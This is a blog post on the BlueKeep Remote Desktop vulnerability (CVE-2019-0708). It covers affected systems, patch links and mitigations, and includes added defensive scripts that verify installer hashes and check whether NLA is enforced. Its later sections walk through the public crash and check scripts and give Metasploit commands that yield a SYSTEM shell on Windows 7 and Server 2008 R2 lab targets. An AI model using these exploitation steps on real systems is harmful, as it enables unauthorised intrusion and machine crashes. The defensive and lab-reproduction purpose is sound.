CVE-2019-0708 Remote Desktop vulnerability: verification and exploitation

Author: JJJoeee | Published 2020-03-17 15:42

    Affected versions:

    Windows 7 for 32-bit Systems Service Pack 1
    Windows 7 for x64-based Systems Service Pack 1
    Windows Server 2008 for 32-bit Systems Service Pack 2
    Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 for Itanium-Based Systems Service Pack 2
    Windows Server 2008 for x64-based Systems Service Pack 2
    Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
    Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
    Windows Server 2008 R2 for x64-based Systems Service Pack 1
    Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
    Windows XP SP3 x86
    Windows XP Professional x64 Edition SP2
    Windows XP Embedded SP3 x86
    Windows Server 2003 SP2 x86
    Windows Server 2003 x64 Edition SP2

    Windows 8, Windows 10, Windows Server 2012 and later are not affected. The bug sits in the kernel-mode RDP driver (termdd.sys) and is reached before any credentials are supplied, so an exposed TCP port 3389 on any system above is enough for an unauthenticated attacker. Short of patching, the two mitigations Microsoft lists are enabling Network Level Authentication (NLA), which forces a CredSSP logon before the vulnerable channel setup is reachable, and blocking TCP 3389 at the perimeter.

    Microsoft advisory and patch downloads for supported systems (XP and 2003 are not covered there):

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

    The fix for Windows 7 / Server 2008 R2 is in KB4499175 (security-only) and for Server 2008 SP2 in KB4499180, or in the May 2019 monthly rollups that contain them; after patching, confirm one of these shows in the installed updates list. XP and Server 2003 are out of support and received the separate out-of-band package KB4500331 linked below.

    Windows Server 2003 patch download addresses

    Windows Server 2003 32-bit:
    http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
    Windows Server 2003 64-bit:
    http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

    Windows XP patch download addresses

    Windows XP 32-bit:
    http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
    Windows XP 64-bit (XP Professional x64 shares the Server 2003 x64 code base and takes the Server 2003 x64 package):
    http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

    Note that all four links are plain http://. Verify the downloaded installer before running it: the 40-character hex suffix in each file name is the SHA-1 Microsoft assigns to that file, and on Windows the Authenticode signature should also be checked.
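
    The integrity check described above, as an added example (not code from the original post): it extracts the SHA-1 that Microsoft's download servers embed in the file name of each KB4500331 link and compares it against the bytes actually downloaded. The file name convention is a fact about download.windowsupdate.com URLs; the sample bytes in the test and the script name check_kb4500331.py are constructed for illustration. The script only detects a file that differs from what its URL names; Authenticode verification on Windows is still required before installing.

```python
"""SHA-1 check for the KB4500331 installers linked above.

Added example, not from the original post. Microsoft's download servers name
each package <name>_<sha1>.exe, the 40-hex suffix being the SHA-1 of the file
itself; since the links are plain http://, recompute the hash of whatever
arrived and refuse to run it on a mismatch. On Windows still check the
Authenticode signature before installing; this only catches a file that
differs from what the URL names.
"""
import hashlib
import pathlib
import re
import sys
import urllib.parse

_SHA1_SUFFIX = re.compile(r"_([0-9a-fA-F]{40})\.(?:exe|msu|cab)$")

# The four links from the post, keyed by the system each package is for.
KB4500331_URLS = {
    "server2003-x86": "http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe",
    "server2003-x64": "http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe",
    "xp-x86": "http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe",
    "xp-x64": "http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe",
}


def expected_sha1(url):
    """SHA-1 that Microsoft embeds in the file name of a download URL."""
    name = pathlib.PurePosixPath(urllib.parse.urlparse(url).path).name
    m = _SHA1_SUFFIX.search(name)
    if not m:
        raise ValueError("no SHA-1 suffix in file name: %s" % name)
    return m.group(1).lower()


def sha1_of_bytes(data):
    return hashlib.sha1(data).hexdigest()


def sha1_of_file(path, chunk=1 << 20):
    """Stream the file through SHA-1 so large installers do not load into memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_bytes(data, url):
    return sha1_of_bytes(data) == expected_sha1(url)


def verify_file(path, url):
    """True only when the file on disk matches the hash in its own download URL."""
    return sha1_of_file(path) == expected_sha1(url)


if __name__ == "__main__":
    # usage: python check_kb4500331.py <downloaded file> <system key or full URL>
    path, ref = sys.argv[1], sys.argv[2]
    url = KB4500331_URLS.get(ref, ref)
    ok = verify_file(path, url)
    print("%s: %s" % (path, "OK" if ok else "HASH MISMATCH, do not install"))
    sys.exit(0 if ok else 1)
```

    Run it as `python check_kb4500331.py windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe xp-x86` after downloading; a non-zero exit means the bytes on disk are not the file the URL names.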

    Chinese vulnerability database IDs: CNVD-2019-14264, CNNVD-201905-434

    Reproducing with the Python scripts

    1. Prepare a machine with Python 3 (Windows or Linux both work).

    2. Download the files from https://github.com/n1xbyte/CVE-2019-0708:
    poc.py (checks whether the vulnerability is present)
    crashpoc.py (destructive: triggers the bug and blue-screens the target)
    python xx.py ipAddress 32or64 (whether the target Windows is 32-bit or 64-bit)

    3. Install the impacket package:
    pip3 install impacket
    The Structure class the scripts import comes from impacket.structure; it is not a separate package, so nothing else needs installing.

    4. Install OpenSSL (the scripts negotiate TLS with the RDP server).

    5. Make the two Python files executable and run them. Both exercise an unpatched kernel driver (termdd.sys) before any authentication, and the crash PoC takes the machine down on purpose, so run them only against lab systems you are allowed to reboot. Against a host that enforces Network Level Authentication neither script gets past the initial negotiation.
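
    The first exchange both scripts have to get through, as an added example that is not part of the original post and not the n1xbyte code: it builds the X.224 Connection Request, decodes the server's Connection Confirm, and says whether the host will talk to an unauthenticated client (standard RDP security or TLS without NLA) or refuses with HYBRID_REQUIRED_BY_SERVER, which is what blocks the PoC. It also shows the TS_UD_CS_NET channel list where a BlueKeep client names the internal MS_T120 channel; the surrounding MCS Connect-Initial is not built here. The three sample responses are constructed, and probe() is the only function that touches the network.

```python
"""RDP negotiation probe for the pre-auth path CVE-2019-0708 depends on.

Added example, not code from the original post or the n1xbyte scripts. It
builds the X.224 Connection Request every RDP client (poc.py included) sends
first, parses the server's Connection Confirm, and reports whether the host
accepts an unauthenticated session (standard RDP security or plain TLS) or
insists on NLA, which keeps unauthenticated clients away from the vulnerable
channel setup. It also builds the TS_UD_CS_NET channel list carrying the
internal MS_T120 name that the PoC puts in the later MCS Connect-Initial (the
rest of that PDU is not built here). Sample responses are constructed.
"""
import socket
import struct

TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
PROTOCOL_RDP = 0x00000000     # standard RDP security, no TLS
PROTOCOL_SSL = 0x00000001     # TLS without NLA: still unauthenticated
PROTOCOL_HYBRID = 0x00000002  # CredSSP / NLA
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER",
                 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}

def build_x224_connection_request(requested=PROTOCOL_RDP | PROTOCOL_SSL):
    """TPKT + X.224 CR-TPDU + rdpNegReq (MS-RDPBCGR 2.2.1.1)."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested)
    # fixed X.224 part after the length indicator: code 0xE0 (CR), dst-ref, src-ref, class 0
    x224 = struct.pack(">BHHB", 0xE0, 0, 0, 0) + neg_req
    x224 = bytes([len(x224)]) + x224            # LI counts the bytes that follow it
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224

def parse_x224_connection_confirm(data):
    """Decode a Connection Confirm (MS-RDPBCGR 2.2.1.2) into one of
    {'legacy': True} (no rdpNegData: old server, standard security only),
    {'selected_protocol': n} or {'failure': name}."""
    if len(data) < 11 or data[0] != 3 or struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("not a complete TPKT-framed PDU")
    li, code = data[4], data[5]
    if code != 0xD0:                             # CC-TPDU
        raise ValueError("not an X.224 Connection Confirm (0x%02x)" % code)
    if li == 6:                                  # fixed header only, no rdpNegData
        return {"legacy": True}
    if li < 14 or len(data) < 19:
        raise ValueError("truncated rdpNegData")
    ntype, _flags, nlen, value = struct.unpack("<BBHI", data[11:19])
    if nlen != 8:
        raise ValueError("bad rdpNegData length %d" % nlen)
    if ntype == TYPE_RDP_NEG_RSP:
        return {"selected_protocol": value}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"failure": FAILURE_CODES.get(value, "0x%08x" % value)}
    raise ValueError("unknown rdpNegData type 0x%02x" % ntype)

def unauthenticated_path_open(confirm):
    """True when a client can reach MCS channel setup without NLA."""
    if confirm.get("legacy"):
        return True
    if "failure" in confirm:
        return False
    return confirm["selected_protocol"] in (PROTOCOL_RDP, PROTOCOL_SSL)

def build_cs_net_block(channel_names):
    """TS_UD_CS_NET (MS-RDPBCGR 2.2.1.3.4): the client's static virtual channel
    list, carried in the GCC user data of the MCS Connect-Initial. Naming the
    server-internal MS_T120 channel here is the CVE-2019-0708 ingredient."""
    defs = b""
    for name in channel_names:
        raw = name.encode("ascii")
        if len(raw) > 7:
            raise ValueError("channel names are at most 7 bytes plus NUL")
        defs += raw.ljust(8, b"\x00") + struct.pack("<I", 0)   # CHANNEL_DEF: name[8], options
    body = struct.pack("<I", len(channel_names)) + defs           # channelCount + array
    return struct.pack("<HH", 0xC003, 4 + len(body)) + body      # header: type, total length

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-PDU")
        buf += chunk
    return buf

def probe(host, port=3389, timeout=5.0):
    """Send one Connection Request to a live host and classify its answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_x224_connection_request())
        hdr = _recv_exact(s, 4)
        pdu = hdr + _recv_exact(s, struct.unpack(">H", hdr[2:4])[0] - 4)
    confirm = parse_x224_connection_confirm(pdu)
    return confirm, unauthenticated_path_open(confirm)

# Constructed sample answers: NLA enforced, TLS-only, and a pre-negotiation server.
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed000001234000300080005000000")
SAMPLE_TLS_SELECTED = bytes.fromhex("030000130ed000001234000200080001000000")
SAMPLE_LEGACY = bytes.fromhex("0300000b06d00000123400")
```

    probe("192.168.1.7") returns the decoded confirm and a boolean; a False with failure HYBRID_REQUIRED_BY_SERVER means NLA is on and the unauthenticated PoC has nothing to work with, while True only says the negotiation is open, not that the host is unpatched. The probe asks for RDP|SSL rather than RDP alone, because a server that requires TLS (but not NLA) is still reachable without credentials and would otherwise be reported as closed.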

    Reproducing with Metasploit

    Get the Metasploit files:
    Download address: https://github.com/rapid7/metasploit-framework
    RDP library: metasploit-framework/lib/msf/core/exploit/rdp.rb
    RDP scanner module: metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    CVE-2019-0708 check module: metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    CVE-2019-0708 exploit module: metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    Fetching these by hand is only needed on an older install; the exploit module was merged into the framework in September 2019 and ships with current releases. If you do copy them in manually, keep the same relative paths under your Metasploit directory, otherwise reload_all will not pick them up.

    Attacking Windows 7 SP1 to reproduce CVE-2019-0708

    msfconsole
    msf5> reload_all
    msf5> search cve_2019_0708_bluekeep_rce
    msf5> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.7
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > shell
    If it succeeds, the session drops you into a command prompt on the target; whoami and net user confirm where you are. Because the bug is in the kernel driver termdd.sys, the payload runs as NT AUTHORITY\SYSTEM rather than as any logged-on user. The target number is not an OS choice: the module's targets (info lists them) correspond to the hypervisor the victim runs under (VirtualBox, VMware, Hyper-V and so on), because the non-paged-pool addresses the exploit grooms differ between them, and target 0 tries to fingerprint the right one automatically. A wrong target usually blue-screens the victim instead of returning a session, so run the auxiliary check module listed above first and exploit only lab machines you can afford to reboot.

    Attacking Windows Server 2008 R2 SP1 to reproduce CVE-2019-0708

    The registry value [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdp-tcp\fDisableCam] must be changed to 0 (the system default is 1; CurrentControlSet is the usual alias for the active control set). Microsoft notes that with the default value a 2008 R2 host is not exploitable by this technique, although it is still vulnerable and must be patched; restart the machine after changing the value so Remote Desktop Services reads it. As with Windows 7, the target number must match the victim's hypervisor, not the OS version.
    Then run the following in MSF:
    msf5 > search cve_2019_0708_bluekeep_rce
    msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.10
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rport 3389
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

    Article link: https://www.haomeiwen.com/subject/pwhbshtx.html